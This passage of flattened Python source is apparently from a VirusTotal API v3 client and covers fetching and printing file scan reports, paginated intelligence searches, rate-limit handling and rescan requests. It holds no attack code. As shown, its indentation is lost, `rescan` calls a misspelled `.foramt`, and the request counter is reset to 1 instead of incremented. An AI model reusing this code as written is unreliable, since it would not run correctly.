get_detections(jdata['scans'], **kwargs) if 'md5' in jdata: print('\n\tResults for MD5 : {0}'.format(jdata.get('md5'))) if 'sha1' in jdata: print('\tResults for SHA1 : {0}'.format(jdata.get('sha1'))) if 'sha256' in jdata: print('\tResults for SHA256 : {0}'.format(jdata.get('sha256'))) if kwargs.get('verbose') == True and jdata.get('scans'): print('\nVerbose VirusTotal Information Output:') plist = [[]] for x in sorted(jdata.get('scans')): if jdata['scans'][x].get('detected'): plist.append([x, 'True', jdata['scans'][x]['result'] if jdata['scans'][x]['result'] else ' -- ', jdata['scans'][x]['engine_version'] if 'engine_version' in jdata['scans'][x] and jdata['scans'][x]['engine_version'] else ' -- ', jdata['scans'][x]['engine_update'] if 'engine_update' in jdata['scans'][x] and jdata['scans'][x]['engine_update'] else ' -- ' ]) av_size, result_size, version = get_adequate_table_sizes( jdata['scans']) if version == 9: version_align = 'c' else: version_align = 'l' if plist != [[]]: pretty_print_special(plist, ['Vendor name', 'Detected', 'Result', 'Version', 'Last Update'], [av_size, 9, result_size, version, 12], ['r', 'c', 'l', version_align, 'c'], kwargs.get('email_template') ) del plist if kwargs.get('dump') is True: jsondump(jdata, jdata.get('sha1')) if kwargs.get('csv') is True: filename = jdata.get('scan_id') dump_csv(filename, jdata.get('scans')) if jdata.get('permalink'): print("\n\tPermanent Link : {0}\n".format(jdata.get('permalink'))) return True # Static variable decorator for function def static_var(varname, value): def decorate(func): setattr(func, varname, value) return func return decorate # Track how many times we issue a request @static_var("counter", 0) # Track when the first request was sent @static_var("start_time", 0) def get_response(url, method="get", **kwargs): # Set on first request if get_response.start_time == 0: get_response.start_time = time.time() # Increment every request get_response.counter = 1 jdata = '' response = '' kwargs['timeout'] = req_timeout kwargs["headers"] = {"x-apikey": apikey} while True: try: response = getattr(requests, method)(url, **kwargs) except requests.exceptions.ConnectionError: print('\n[!] Some network connection happend, check your internet conection, or it can be VT API server side issue\n') return {}, '' if response: if response.status_code == 403: private_api_access_error() if response.status_code != 204 and hasattr(response, 'json'): try: jdata = response.json() except Exception as e: jdata = response.json break else: return {}, '' # Determine minimum time we need to wait for limit to reset wait_time = 59 - int(time.time() - get_response.start_time) if wait_time < 0: wait_time = 60 print("Reached per minute limit of {0:d}; waiting {1:d} seconds\n".format(get_response.counter, wait_time)) time.sleep(wait_time) # Reset static vars get_response.counter = 0 get_response.start_time = 0 return jdata, response def _check_error(jdata): error = False if 'error' in jdata: print('[!] Code: {} - Description: {}'.format(jdata['error']['code'], jdata['error']['description'])) error = True return error class PRINTER(object): def print_key(self, key, indent='\n', separator='[+]'): try: print('{0}{1} {2}'.format(indent, separator, key.capitalize().replace('_', ' ').replace('-', ' '))) except Exception as e: print(e) # key:value def simple_print(self, block, keys): for key in keys: if block.get(key) and block[key]: self.print_key(key, indent=' ') if isinstance(block.get(key), list): print('\t', '\n\t'.join(block.get(key))) else: print('\t', block.get(key)) # key:[] def list_print(self, block, keys): for key in keys: if block.get(key) and block[key]: self.print_key(key) print('\t', '\n\t'.join(block.get(key))) def _print_complex_dict(self, jdata, key, **kwargs): self.print_key(key) plist = [[]] for jdata_part in jdata[key]: if isinstance(jdata_part, six.string_types): plist.append([jdata_part, jdata[key][jdata_part]]) elif isinstance(jdata_part, dict): plist.append(jdata_part.values()) key_s, key_v = get_sizes(jdata[key]) pretty_print_special(plist, ['Name', 'Value'], [key_s, key_v], ['r', 'l'], kwargs.get('email_template')) del plist # key:{subkey:[]} def dict_list_print(self, block, keys): for key in keys: if block.get(key) and block[key]: self.print_key(key) if isinstance(block.get(key), list): for sub_list in block.get(key): if isinstance(sub_list, list): print('\n\t', '\n\t'.join([str(part) for part in sub_list])) elif isinstance(sub_list, dict): for sub_key, sub_value in list(sub_list.items()): print('\t', sub_key, sub_value) print('\n') elif isinstance(block.get(key), dict): for sub_key in block.get(key, []): if block[key].get(sub_key, {}): self.print_key(sub_key) for ssub_dict in block[key].get(sub_key, {}): print('\n') for ssub_key, ssub_value in list(ssub_dict.items()): print('\t', ssub_key, ssub_value) # key:{subkey:{}} def dict_print(self, block, keys): for key in keys: if block.get(key, []): self.print_key(key) for sub_key, value in list(block[key].items()): if isinstance(value, list): print('\n', sub_key, '\n\t', '\n\t'.join(value)) else: print('\n', sub_key, '\n\t', value) class vtAPI(PRINTER): def __init__(self): super(PRINTER, self).__init__() self.params = dict() self.base = 'https://www.virustotal.com/api/v3/{0}' def __aux_search(self, url, page_limit): """ Aux function to grab more than 300 hashes """ info = list() count = 1 while True: try: print("[+] Getting page {} result".format(count)) if page_limit >= count: jdata, response = get_response(url, params=self.params) count += 1 if jdata and 'data' in jdata: info += jdata['data'] if jdata['links']['next'] != response.url: url = jdata['links']['next'] else: break else: break except Exception as e: print(e) count += 1 if page_limit >= count: break return info def _parse_aux(self, block, **kwargs): basic_file_info_list = ( 'md5', 'sha1', 'sha256', 'ssdeep', 'authentihash', 'vhash', 'magic', 'type_description',\ 'type_tag', 'creation_date', 'times_submitted', 'size', 'total_votes', 'unique_sources',\ 'meaningful_name', 'reputation', ) basic_info = dict() to_time = ('first_submission_date', 'last_submission_date', 'last_analysis_date', 'last_modification_date') [basic_info.update({key:datetime.fromtimestamp(block[key]).strftime('%Y-%m-%d %H:%M:%S')}) for key in to_time if key in block] [basic_info.update({key:block[key]}) for key in basic_file_info_list if key in block] self._print_complex_dict({'basic':basic_info}, 'basic', **{'email_template':True}) for key in ('names', 'tags'): if block.get(key): self.list_print(block, [key]) """ behaviour trid """ for key in ('signature_info', 'exiftool', 'last_analysis_stats'): if block.get(key): self._print_complex_dict(block, key, **{'email_template':True}) get_detections(block['last_analysis_results'], manual_engines=block['last_analysis_results'].keys(), **kwargs) def getReport(self, *args, **kwargs): """ A md5/sha1/sha256 hash will retrieve the most recent report on a given sample. You may also specify a scan_id (sha256-timestamp as returned by the file upload API) to access a specific report. You can also specify a CSV list made up of a combination of hashes and scan_ids (up to 4 items or 25 if you have private api with the standard request rate), this allows you to perform a batch request with one single call. """ return_json = dict() jdatas = list() result, name = is_file(kwargs.get('value')) if result: jdatas = load_file(name) if isinstance(jdatas, list): jdatas = jdatas else: jdatas = [jdatas] kwargs['dump'] = False else: if isinstance(kwargs.get('value'), list) and len(kwargs.get('value')) == 1: pass elif isinstance(kwargs.get('value'), six.string_types): kwargs['value'] = [kwargs.get('value')] for hashes_report in kwargs.get('value'): if os.path.isfile(hashes_report): print('\nCalculating hash for:', hashes_report) hashes_report = hashlib.sha256(open(hashes_report, 'rb').read()).hexdigest() #ToDo all options # https://developers.virustotal.com/v3.0/reference#intelligence-search if (kwargs.get('search_intelligence') or 'search_intelligence' in args): self.params['query'] = [hashes_report] url = self.base.format('intelligence/search') else: self.params['resource'] = hashes_report url = self.base.format('files/{}'.format(hashes_report)) jdata, response = get_response(url, params=self.params) if 'next' in jdata.get('data', dict).get('links', dict()) and kwargs.get('search_intelligence_limit', 1) > 1: info = self.__aux_search(jdata['data']['links']['next'], kwargs['search_intelligence_limit']) jdata['data'] += info if kwargs.get('return_raw'): return jdata jdatas.append(jdata) if isinstance(jdatas, list) and jdatas == []: if kwargs.get('return_raw'): pass else: print('Nothing found') return if not isinstance(jdatas, list): jdatas = [jdatas] for jdata in jdatas: if isinstance(jdata, dict): if _check_error(jdata): continue if jdata.get('data'): if kwargs.get('dump'): jsondump(jdata, name) if kwargs.get('not_exit'): return False if kwargs.get('search_intelligence') or 'search_intelligence' in args: if kwargs.get('return_json') and (kwargs.get('hashes') or 'hashes' in args): return_json['hashes'] = [block['attributes']['sha256'] for block in jdata['data']] else: print('[+] Matched hash(es):') for block in jdata['data']: print('{} - FS:{} - LS:{}'.format(block['attributes']['sha256'], \ datetime.fromtimestamp(block['attributes']['first_submission_date']).strftime('%Y-%m-%d %H:%M:%S'), \ datetime.fromtimestamp(block['attributes']['last_analysis_date']).strftime('%Y-%m-%d %H:%M:%S')) ) if kwargs.get('verbose') or kwargs.get('allinfo'): self._parse_aux(block['attributes'], **kwargs) print("\n\n") if kwargs.get('download'): kwargs.update({'value': block['attributes']['sha256'], 'download':'file'}) self.download(**kwargs) else: self._parse_aux(jdata['data']['attributes'], **kwargs) if kwargs.get('allinfo'): pass #ToDo remove """ if kwargs.get('verbose'): #print(jdata) basic_file_info_list = ( 'md5', 'sha1', 'sha256', 'ssdeep', 'scan_date', 'first_seen', 'last_seen', 'times_submitted', 'scan_id', 'harmless_votes', 'community_reputation', 'malicious_votes', ) self.simple_print(jdata, basic_file_info_list) self.list_print(jdata, ['submission_names']) if jdata.get('ITW_urls') and ((kwargs.get('ITW_urls') or 'ITW_urls' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json['ITW_urls'] = jdata.get('ITW_urls') else: self.list_print(jdata, ['ITW_urls']) if kwargs.get('verbose'): file_info_list = ( 'type', 'size', 'tags', 'unique_sources', ) self.simple_print(jdata, file_info_list) simple_list = ( 'magic', 'first_seen_itw', 'trendmicro-housecall-heuristic', 'deepguard', 'unique_sources', 'trid', 'pe-timestamp' ) list_list = ( 'compressed_parents', ) dict_keys = ( 'pe-overlay', 'pe-resource-langs', 'pe-resource-types', 'pe-resource-list', ) dict_list_keys = ( 'sections', ) if kwargs.get('verbose'): self.simple_print(jdata['additional_info'], simple_list) self.list_print(jdata['additional_info'], list_list) self.dict_print(jdata['additional_info'], dict_keys) self.dict_list_print(jdata['additional_info'], dict_list_keys) if jdata['additional_info'].get('rombioscheck') and ((kwargs.get('rombioscheck_info') or 'rombioscheck_info' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json['rombioscheck'] = jdata['additional_info'].get('rombioscheck') else: print('\n[+] RomBiosCheck:') print('\t') # this removes code duplication simple_list = ( 'contained_hash', 'executable_file', 'firmware_volume_count', 'max_tree_level', 'format', 'raw_objects', 'raw_sections', 'section_count', 'vhash', 'win32_file', ) list_keys = ( 'acpi_tables', 'nvar_variable_names', 'tags' ) double_list = ( 'apple_data', 'manufacturer_candidates' ) self.simple_print(jdata['additional_info']['rombioscheck'], simple_list) self.list_print(jdata['additional_info']['rombioscheck'], list_keys) for key in double_list: if jdata['additional_info']['rombioscheck'].get(key) and kwargs.get('verbose'): self.print_key(key) for block in jdata['additional_info']['rombioscheck'].get(key): print('\t', block[0], ':', block[1]) simple_dict = ( 'smbios_data', 'biosinformation', 'systeminformation' ) for key in simple_dict: if jdata['additional_info']['rombioscheck'].get(key) and kwargs.get('verbose'): self.print_key(key) plist = [[]] for sub_key, value in jdata['additional_info']['rombioscheck'].get(key).items(): if isinstance(value, list): value = '\n'.join(value) plist.append([sub_key, str(value).replace(',', '\n')]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], False, ['r', 'l'], kwargs.get('email_template')) del plist dict_keys = ( 'option_roms', 'certs' ) for key in dict_keys: if jdata['additional_info']['rombioscheck'].get(key) and kwargs.get('verbose'): self.print_key(key) for block in jdata['additional_info']['rombioscheck'].get(key, {}): plist = [[]] for key, value in block.items(): if isinstance(value, list): value = '\n'.join(value) plist.append([key, str(value).replace(',', '\n')]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], False, ['r', 'l'], kwargs.get('email_template')) del plist complex_dict = ( 'win32children', 'children' ) for key in complex_dict: if jdata['additional_info']['rombioscheck'].get(key) and kwargs.get('verbose'): self.print_key(key) for cert in jdata['additional_info']['rombioscheck'].get(key, {}): plist = [[]] for key, value in cert.items(): if key == 'detection_ratio': value = '/'.join([str(num) for num in value]) if key in ('tags', 'imports'): value = '\n'.join(value) if key == 'certs': certs = list() for certificates in value: for sub_key, sub_value in certificates.items(): if sub_key == 'subject': certs.append('{0}: {1}\n\n----------------'.format(sub_key, sub_value)) else: certs.append('{0}: {1}'.format(sub_key, sub_value)) value = '\n'.join(certs) plist.append([key, value]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], [20, 64], ['r', 'l'], kwargs.get('email_template')) del plist if jdata['additional_info'].get('rombios_generator') and ((kwargs.get('rombios_generator_info') or 'rombios_generator_info' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json['rombios_generator'] = jdata['additional_info'].get('rombios_generator') else: print('\n[+] RomBios Generator:') dict_keys = ( 'source', ) for key in dict_keys: if jdata['additional_info']['rombios_generator'].get(key) and kwargs.get('verbose'): self.print_key(key) plist = [[]] for key, value in jdata['additional_info']['rombios_generator'].get(key, {}).items(): if isinstance(value, list): value = '\n'.join(value) plist.append([key, str(value).replace(',', '\n')]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], False, ['r', 'l'], kwargs.get('email_template')) del plist if jdata['additional_info']['rombios_generator'].get('diff') and kwargs.get('verbose'): pass if jdata['additional_info'].get('debcheck') and ((kwargs.get('debcheck_info') or 'debcheck_info' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json['debcheck'] = jdata['additional_info'].get('debcheck') else: print('\n[+] DebCheck') simple_list = ( 'vhash', 'tags' ) dict_list = ( 'structural_metadata', 'control_metadata', 'control_scripts' ) complicated_dict_list = ( 'children', ) for key in simple_list: if jdata['additional_info']['debcheck'].get(key): self.print_key(key) if isinstance(jdata['additional_info']['debcheck'].get(key), list): print('\t', '\n\t'.join(jdata['additional_info']['debcheck'].get(key))) elif isinstance(jdata['additional_info']['debcheck'].get(key), six.string_types): print('\t', jdata['additional_info']['debcheck'].get(key)) for key in dict_list: if jdata['additional_info']['debcheck'].get(key): self.print_key(key) plist = [[]] for sub_key, value in jdata['additional_info']['debcheck'][key].items(): plist.append([sub_key, value]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], False, ['r', 'l'], kwargs.get('email_template')) del plist for key in complicated_dict_list: if jdata['additional_info']['debcheck'].get(key): self.print_key(key) for block in jdata['additional_info']['debcheck'].get(key, {}): for sub_key, sub_value in block.items(): if sub_key == 'detection_ratio': sub_value = '/'.join([str(ssub) for ssub in sub_value]) print('\t', sub_key, ':', sub_value) print('\n') if jdata['additional_info'].get('androguard') and ((kwargs.get('androidguard_info') or 'androidguard_info' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json['androguard'] = jdata['additional_info'].get('androguard') else: print('\n[+] AndroidGuard') simple_list = ( 'AndroguardVersion', 'AndroidApplication', 'AndroidApplicationError', 'AndroidApplicationInfo', 'AndroidVersionCode', 'AndroidVersionName', 'VTAndroidInfo', 'Main Activity', 'MinSdkVersion', 'TargetSdkVersion', 'Package', 'SourceFile', ) list_list = ( 'Libraries', 'Activities', 'StringsInformation' ) dict_list = ( 'Permissions', 'RiskIndicator', ) self.simple_print(jdata['additional_info']['androguard'], simple_list) self.list_print(jdata['additional_info']['androguard'], list_list) self.dict_print(jdata['additional_info']['androguard'], dict_list) #certificates info cert_list = ( 'Subject', 'validto', 'serialnumber', 'thumbprint', 'validfrom', 'Issuer' ) if jdata['additional_info']['androguard'].get('certificate'): for key in cert_list: if jdata['additional_info']['androguard']['certificate'].get(key): self.print_key(key) if key in ('Subject', 'Issuer'): for sub_key, sub_value in jdata['additional_info']['androguard']['certificate'].get(key).items(): print('\t', sub_key, ':', sub_value) else: print('\t', jdata['additional_info']['androguard']['certificate'].get(key)) if jdata['additional_info']['androguard'].get('intent-filters'): print('\n[+]', 'Intent-filters') for key in jdata['additional_info']['androguard'].get('intent-filters'): print('\t', key) for sub_key in jdata['additional_info']['androguard']['intent-filters'].get(key, {}): print('\n\t\t', sub_key) for ssub_key in jdata['additional_info']['androguard']['intent-filters'][key].get(sub_key): print('\n\t\t\t', ssub_key) print('\n\t\t\t\t', '\n\t\t\t\t'.join(jdata['additional_info']['androguard']['intent-filters'][key][sub_key].get(ssub_key))) if jdata.get('email_parents') and kwargs.get('verbose'): print('\n[+] Email parents:') for email in jdata['email_parents']: print('\t{email}'.format(email=email)) if jdata['additional_info'].get('referers') and kwargs.get('verbose'): print('\n[+] Referers:') print('\t', '\n\t'.join(jdata['additional_info']['referers'])) # IDS, splited to be easily getted throw imported vt as library ids = ( 'suricata', 'snort' ) for key in ids: if jdata['additional_info'].get(key) and (kwargs.get(key) or key in args) or kwargs.get('verbose'): if kwargs.get('return_json'): return_json[key] = jdata['additional_info'].get(key) else: if jdata['additional_info'].get(key, ''): self.print_key(key) for rule in jdata['additional_info'].get(key): print('\nRule:', rule) print('\tAlert\n\t\t', jdata['additional_info'][key][rule]['alert']) print('\tClassification\n\t\t', jdata['additional_info'][key][rule]['classification']) print('\tDescription:') for desc in jdata['additional_info'][key][rule]['destinations']: print('\t\t', desc) if jdata['additional_info'].get('traffic_inspection') and (kwargs.get('traffic_inspection') or 'traffic_inspection' in args) or kwargs.get('verbose'): if kwargs.get('return_json'): return_json['traffic_inspection'] = jdata['additional_info'].get('traffic_inspection') else: if jdata['additional_info'].get('traffic_inspection'): print('\n[+] Traffic inspection') for proto in jdata['additional_info'].get('traffic_inspection'): print('\tProtocol:', proto) for block in jdata['additional_info'].get('traffic_inspection')[proto]: plist = [[]] for key, value in block.items(): plist.append([key, str(value)]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], False, ['r', 'l'], kwargs.get('email_template')) del plist if jdata['additional_info'].get('wireshark') and (kwargs.get('wireshark_info') or 'wireshark_info' in args) or kwargs.get('verbose'): if kwargs.get('return_json'): return_json['wireshark'] = jdata['additional_info'].get('wireshark') else: if jdata['additional_info'].get('wireshark', {}): print('\n[+] Wireshark:') if jdata['additional_info'].get('wireshark', {}).get('pcap'): plist = [[]] for key, value in jdata['additional_info'].get('wireshark', {}).get('pcap').items(): plist.append([key, value]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], False, ['c', 'l'], kwargs.get('email_template')) del plist if jdata['additional_info'].get('wireshark', {}).get('dns'): print('\n[+] DNS') plist = [[]] key_s, value_s = get_sizes(jdata['additional_info'].get('wireshark')) for domain in jdata['additional_info'].get('wireshark').get('dns'): plist.append([domain[0], '\n\t'.join(domain[1])]) if plist != [[]]: pretty_print_special(plist, ['Domain', 'IP(s)'], False, ['r', 'l'], kwargs.get('email_template')) del plist if jdata['additional_info'].get('behaviour-v1'): dict_keys = ( 'mutex', ) if kwargs.get('verbose'): self.dict_list_print(jdata['additional_info']['behaviour-v1'], dict_keys) if jdata['additional_info']['behaviour-v1'].get('tags'): print('\n[+] Tags:') for tag in jdata['additional_info']['behaviour-v1'].get('tags'): print('\t', tag) if jdata['additional_info']['behaviour-v1'].get('dropped_files') and kwargs.get('verbose'): print('\n[+] Dropped files:') plist = [[]] for files in jdata['additional_info']['behaviour-v1'].get('dropped_files'): plist.append([files.get('hash'), files.get('filename')]) if plist != [[]]: pretty_print_special(plist, ['Hash(sha256?)', 'Filename'], [64, 50], ['c', 'l'], kwargs.get('email_template')) del plist if jdata['additional_info']['behaviour-v1'].get('network', {}) and kwargs.get('verbose'): print('\n[+] Network') network_list = ( 'tcp', 'udp' ) for key in network_list: if jdata['additional_info']['behaviour-v1']['network'].get(key): plist = [[]] [plist.append([ip]) for ip in jdata['additional_info']['behaviour-v1']['network'].get(key)] pretty_print_special(plist, [key.upper()], False, False, kwargs.get('email_template')) # ToDo hosts if jdata['additional_info']['behaviour-v1']['network'].get('dns') and kwargs.get('verbose'): print('\n[+] DNS:') plist = [[]] for block in jdata['additional_info']['behaviour-v1']['network'].get('dns'): plist.append([block.get('ip'), block.get('hostname')]) pretty_print_special(plist, ['Ip', 'Hostname'], False, False, kwargs.get('email_template')) #if jdata['additional_info']['behaviour-v1']['network'].get('http'): # print '\n[+] HTTP:', jdata['additional_info']['behaviour-v1']['network'].get('http') if jdata['additional_info']['behaviour-v1'].get('codesign') and kwargs.get('verbose'): print('\n[+] Codesign:\n\t',jdata['additional_info']['behaviour-v1'].get('codesign').replace('\n', '\n\t')) if jdata['additional_info']['behaviour-v1'].get('process') and kwargs.get('verbose'): dict_keys = ( 'injected', 'shellcmds', 'terminated', 'tree' ) print('\n[+] Process') self.dict_list_print(jdata['additional_info']['behaviour-v1']['process'], dict_keys) if jdata['additional_info']['behaviour-v1'].get('registry') and kwargs.get('verbose'): dict_keys = ( 'deleted', 'set' ) #print '\n[+] Registry' #self.dict_list_print(jdata['additional_info']['behaviour-v1']['registry'], dict_keys) if jdata['additional_info']['behaviour-v1'].get('windows') and kwargs.get('verbose'): dict_keys = ( 'windows', 'runtime-dlls', 'hooking', 'filesystem' ) self.dict_list_print(jdata['additional_info']['behaviour-v1'], dict_keys) if kwargs.get('verbose'): simple_list = ( 'knockknock', 'tun_time', 'internal_tags', 'num_screenshots', 'version' ) self.simple_print(jdata['additional_info']['behaviour-v1'], simple_list) if jdata['additional_info']['behaviour-v1'].get('signals') and kwargs.get('verbose'): print('\n[+] Signals:') plist = [[]] for signals in jdata['additional_info']['behaviour-v1'].get('signals'): plist.append( [signals.get('cmd'), signals.get('target'), signals.get('signo'), signals.get('pid'), signals.get('walltimestamp'), signals.get('execname')]) if plist != [[]]: pretty_print_special(plist, ['CMD', 'Target', 'Signo', 'PID', 'WallTimeStamp', 'ExecName'], False, False, kwargs.get('email_template')) del plist if jdata['additional_info']['behaviour-v1'].get('filesystem') and kwargs.get('verbose'): print('\n[+] Filesystem:') if jdata['additional_info']['behaviour-v1']['filesystem'].get('opened'): plist = [[]] for fs_open in jdata['additional_info']['behaviour-v1']['filesystem'].get('opened'): plist.append( [fs_open.get('success'), fs_open.get('execname'), fs_open.get('path')]) if plist != [[]]: pretty_print_special(plist, ['Success', 'ExecName', 'Path'], [8, 20, 80], ['c', 'c', 'l'], kwargs.get('email_template')) del plist if jdata['additional_info']['behaviour-v1'].get('output'): print('\n[+] Output:', jdata['additional_info']['behaviour-v1'].get('output')) if jdata['additional_info'].get('sigcheck') and kwargs.get('verbose'): print('\n[+] PE signature block:') plist = [[]] for sig in jdata['additional_info']['sigcheck']: if isinstance(jdata['additional_info']['sigcheck'][sig], list): self.print_key(sig) for data in jdata['additional_info']['sigcheck'][sig]: sub_plist = [[]] for key in data.keys(): sub_plist.append([key, data[key]]) pretty_print_special(sub_plist, ['Name', 'Value'], False, False, kwargs.get('email_template')) del sub_plist else: plist.append( [sig, jdata['additional_info']['sigcheck'][sig].encode('utf-8')] # texttable unicode fail ) pretty_print_special(plist, ['Name', 'Value'], False, False, kwargs.get('email_template')) del plist if jdata['additional_info'].get('exiftool') and kwargs.get('verbose'): self.dict_print(jdata['additional_info'], ['exiftool']) if jdata['additional_info'].get('imports') and kwargs.get('verbose'): self.dict_print(jdata['additional_info'], ['imports']) if jdata['additional_info'].get('dmgcheck') and kwargs.get('verbose'): print('\n[+] dmgCheck:') if jdata['additional_info']['dmgcheck'].get('plst_keys'): print('\n[+] plst_keys:') for key in jdata['additional_info']['dmgcheck']['plst_keys']: print('\t{}'.format(key)) if jdata['additional_info']['dmgcheck'].get('plst'): plist = [[]] for plst in jdata['additional_info']['dmgcheck']['plst']: plist.append( [plst.get('attributes'), plst.get('name')]) if plist != [[]]: pretty_print_special(plist, ['Attributes', 'Name'], False, False, kwargs.get('email_template')) del plist dmgcheck_list = ( 'xml_offset', 'xml_length', 'data_fork_offset', 'running_data_fork_offset', 'rsrc_fork_offset', ) if jdata['additional_info']['dmgcheck'].get('resourcefork_keys'): print('\n[+] resourcefork keys:') for key in jdata['additional_info']['dmgcheck']['resourcefork_keys']: print('\t', key) if jdata['additional_info']['dmgcheck'].get('blkx'): print('\n[+] blkx:') plist = [[]] for blkx in jdata['additional_info']['dmgcheck']['blkx']: plist.append( [blkx.get('attributes'), blkx.get('name')]) if plist != [[]]: pretty_print_special(plist, ['Attributes', 'Name'], False, False, kwargs.get('email_template')) del plist if jdata['additional_info']['dmgcheck'].get('iso') and jdata['additional_info']['dmgcheck']['iso'].get('volume_data', {}): print('\n[+] Volume data') plist = [[]] for key, value in jdata['additional_info']['dmgcheck']['iso'].get('volume_data', {}).items(): plist.append([key, value]) if plist != [[]]: pretty_print_special(plist, ['Key', 'Value'], [22, 80], ['r', 'l', ], kwargs.get('email_template')) del plist hfs_dict_list = ( 'executables', 'bundles', 'main_executable', ) # ToDo # dmgcheck.iso.unreadable_files for pattern in ('hfs', 'iso'): for key in hfs_dict_list: if jdata['additional_info']['dmgcheck'].get(pattern): if jdata['additional_info']['dmgcheck'][pattern].get(key): self.print_key(key) plist = [[]] if key in ('main_executable', 'volume_data'): jdata['additional_info']['dmgcheck'][pattern][key] = [jdata['additional_info']['dmgcheck'][pattern][key]] for executables in jdata['additional_info']['dmgcheck'][pattern].get(key, ''): detection = executables.get('detection_ratio') detection = '{0}:{1}'.format(detection[0], detection[1]) plist.append( [detection, executables.get('id'), executables.get('size', '-'), executables.get('sha256'), executables.get('path')]) if plist != [[]]: pretty_print_special(plist, ['Detection', 'Id', 'Size', 'sha256', 'Path'], [10, 10, 10, 64, 50], ['c', 'c', 'c', 'c', 'l'], kwargs.get('email_template')) del plist hfs_list = ( 'num_files', 'unreadable_files', 'dmg' ) for key in hfs_list: if jdata['additional_info']['dmgcheck'][pattern].get(key): self.print_key(key) print('\t', jdata['additional_info']['dmgcheck'][pattern][key]) if jdata['additional_info']['dmgcheck'][pattern].get('info_plist', ''): print('\n[+] Info plist: ') for key, value in jdata['additional_info']['dmgcheck'][pattern]['info_plist'].items(): if isinstance(value, dict): print('\t', key, ':') for subkey, subvalue in value.items(): print('\t\t', subkey, ':', subvalue) else: print('\t', key, ':', value) if jdata['additional_info'].get('compressedview') and ((kwargs.get('compressedview') or 'compressedview' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json['compressedview'] = jdata['additional_info']['compressedview']['compressedview'] else: print('\n[+] Compressed view:') if jdata['additional_info']['compressedview'].get('children') and ((kwargs.get('children') or 'children' in args) or kwargs.get('verbose')): if kwargs.get('return_json'): return_json['compresedview_children'] = jdata['additional_info']['compressedview']['children'] else: compressedview_list = ('datetime', 'detection_ratio', 'filename', 'sha256', 'size', 'type') for child in jdata['additional_info']['compressedview'].get('children'): print('\n') for key in compressedview_list: if child.get(key): self.print_key(key, indent='', separator='') if key == 'detection_ratio': print('\t{0}/{1}'.format(child[key][0], child[key][1])) elif key == 'filename': try: print('\t', child[key]) except: try: print('\t', child[key].encode('utf-8')) except: print('\t[-]Name decode error') else: print('\t', child.get(key)) if jdata['additional_info']['compressedview'].get('extensions'): print('\n[+] Extensions:') for ext in jdata['additional_info']['compressedview']['extensions']: print('\t', ext, jdata['additional_info']['compressedview']['extensions'][ext]) if jdata['additional_info']['compressedview'].get('file_types'): print('\n[+] FileTypes') for file_types in jdata['additional_info']['compressedview']['file_types']: print('\t' ,file_types, jdata['additional_info']['compressedview']['file_types'][file_types]) if jdata['additional_info']['compressedview'].get('tags'): print('\n[+] Tags:') for tag in jdata['additional_info']['compressedview']['tags']: print('\t', tag) compressedview_add_list = ( 'lowest_datetime', 'highest_datetime', 'num_children', 'type', 'uncompressed_size', 'vhash' ) self.simple_print(jdata['additional_info']['compressedview'], compressedview_add_list) if jdata['additional_info'].get('detailed_email_parents') and ((kwargs.get('detailed_email_parents') or 'detailed_email_parents' in args) or kwargs.get('verbose')): if kwargs.get('return_json') and (kwargs.get('original-email') or 'original-email' in args): return_json['detailed_email_parents'] = jdata['additional_info']['detailed_email_parents'] else: if not kwargs.get('return_json'): print('\nDetailed email parents:') for email in jdata['additional_info']['detailed_email_parents']: if kwargs.get('email_original'): kwargs['value'] = [email.get('message_id')] parsed = self.parse_email(**kwargs) if parsed: return_json.setdefault('emails', []) if kwargs.get('return_json'): return_json['emails'].append(parsed) else: email_list = ( 'subject', 'sender', 'receiver', 'message_id', ) for key in email_list: if email.get(key): self.print_key(key, indent='\n', separator='') print('\t', email[key]) if email.get('message'): print('\nMessage:') if email['message'] is not None: for line in email['message'].split(b'\n'): print(line.strip()) if jdata.get('total') and kwargs.get('verbose'): print('\n[+] Detections:\n\t{positives}/{total} Positives/Total\n'.format(positives=jdata['positives'], total=jdata['total'])) if jdata.get('scans') and kwargs.get('verbose'): plist = [[]] for x in sorted(jdata.get('scans')): if jdata['scans'][x].get('detected'): plist.append([x, 'True', jdata['scans'][x]['result'] if jdata['scans'][x]['result'] else ' -- ', jdata['scans'][x]['version'] if 'version' in jdata['scans'][x] and jdata['scans'][x]['version'] else ' -- ', jdata['scans'][x]['update'] if 'update' in jdata['scans'][x] and jdata['scans'][x]['update'] else ' -- ' ]) av_size, result_size, version = get_adequate_table_sizes(jdata['scans']) if version == 9: version_align = 'c' else: version_align = 'l' if plist != [[]]: pretty_print_special(plist, ['Vendor name', 'Detected', 'Result', 'Version', 'Last Update'], [av_size, 9, result_size, version, 12], ['r', 'c', 'l', version_align, 'c'], kwargs.get('email_template') ) del plist if jdata.get('permalink') and kwargs.get('verbose'): print('\nPermanent link : {permalink}\n'.format(permalink=jdata['permalink'])) """ else: kwargs.update({'url_report':False}) result = parse_report(jdata, **kwargs) if kwargs.get('return_json'): return return_json else: return result def rescan(self, *args, **kwargs): """ This API allows you to rescan files in VirusTotal's file store without having to resubmit them, thus saving bandwidth. """ if len(kwargs.get('value')) == 1: pass elif isinstance(kwargs.get('value'), six.string_types): kwargs['value'] = [kwargs.get('value')] elif len(kwargs.get('value')) > 1 and not isinstance(kwargs.get('value'), six.string_types): pass for hash_part in kwargs.get('value'): if os.path.exists(hash_part): hash_part = hashlib.md5(open(hash_part, 'rb').read()).hexdigest() url = self.base.format('files/{id}/analyse'.foramt(id = hash_part)) jdatas, response = get_response(url, method='post') if isinstance(jdatas, list) and not filter(None, jdatas): print('Nothing found') return if not isinstance(jdatas, list): jdatas = [jdatas] if kwargs.get('return_raw'): return jdatas for jdata in jdatas: if _check_error(jdata): continue else: if jdata["data"].get('id'): print('[+] Check rescan result with id in few minutes : \n\tID : {id}'.format(id=jdata["data"]['id'])) def fileInfo(self, *args, **kwargs): mem_perm = { "0x0": "-", "0x1": "s", "0x2": 